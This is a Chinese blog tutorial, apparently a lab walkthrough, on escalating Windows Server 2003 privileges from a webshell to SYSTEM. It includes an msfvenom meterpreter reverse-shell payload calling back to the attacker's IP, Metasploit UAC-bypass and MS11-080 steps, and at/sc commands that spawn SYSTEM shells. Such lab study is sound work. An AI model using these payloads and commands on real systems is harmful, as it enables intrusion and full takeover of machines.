windows權限等級划分為 system-administrator-user,通常使用的系統管理員賬號都是administrator,windows提權一般指的都是提權至system權限。本文參考網上文章對windows 2003操作系統進行提權復現。windows 2003比較久遠,並且使用的很少了,這里主要以練習方法為主,后續還會復現高級版本windows的提權操作。
一、准備工作
攻擊機:kali 2019.4 192.168.100.135
靶機:windows 2003 192.168.100.149 使用phpstudy2018提供web服務
前置條件:已經默認拿到webshell,暫不考慮殺軟問題
二、普通用戶提權
1、繞過uac(失敗)
一個普通用戶權限的webshell
Msf生成木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.135 LPORT=4444 -f exe -o payload.exe
菜刀連接上傳后遠程執行
msf監聽系統上線
直接提權失敗
查證后得知需要繞過uac安全機制
UAC:⽤戶帳戶控制(簡稱UAC)是微軟公司在其Windows Vista,及更⾼版本操作系統中采⽤的⼀種控制機制。通過
本⽂你將了解它是如何保護你免受惡意軟件侵害的,以及忽略UAC提⽰將可能給你系統帶來的⿇煩
繞過uac的辦法有:
use exploit/windows/local/ask
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
當前session后台運行,記住session號
選擇exploit/windows/local/ask
再次設置好接收配置
失敗
更換uac繞過exp exploit/windows/local/bypassuac
還是失敗,提示並無漏洞,可能win2003這種方式無法提權,也或許跟版本有關。
2、漏洞提權
還是利用剛才的session
Msf命令:
meterpreter > run post/windows/gather/enum_patches
可以看到存在多個提權漏洞
以ms11-080為例
選擇該提權exp,設置好配置,即可提權
三、administrator提權
1、at提權
At提權
At提權指的是將administrator權限提升至system
在 Windows2000、Windows 2003、Windows XP 這三類系統中,我們可以輕松將Administrators 組下的用戶權限提升到 SYSTEM
at 是一個發布定時任務計划的命令行工具,語法比較簡單。通過 at 命令發布的定時任務計划, Windows 默認以 SYSTEM 權限運行。定時任務計划可以是批處理、可以是一個二進制文件。類似於linux中的suid提權
先在本地服務器環境試驗,如圖,當前賬戶是administrator
輸入at看下
當前時間20:17
我們發布一個20:18自動任務
at 20:18 /interactive cmd ,在20:18的時候打開一個cmd窗口,並使用界面交互模式/interactive,當前賬戶還是administrator
到了20:18后,系統自動彈出一個新的cmd窗口,此時用戶已經成了system
在得到一個system的cmd之后,使用taskmgr命令調用任務管理器,此時的任務管理器是system權限,explorer用戶還是system
然后結束掉explore進程,再使用任務管理器新建explorer進程,將會得到一個system的桌面環境
明白了其原理,那么我們可以通過這條命令實現msf的聯動
找到一個cmdshell后,將我們的msf木馬寫入在at定時任務中
成功回連后,當前用戶即為system
2、sc命令提權
SC 是用於與服務控制管理器和服務進行通信的命令行程序。提供的功能類似於“控制面板”中“管理工具”項中的“服務”。
sc Create syscmd binPath= “cmd /K start” type= own type= interact
這個命令的意思是創建一個名叫syscmd的新的交互式的cmd服務,然后執行
sc start syscmd,就得到了一個system權限的cmd環境
四、總結
主要是學習提權思路,提權方式並不止以上這些。
參考鏈接:https://lengjibo.github.io/windows提權總結/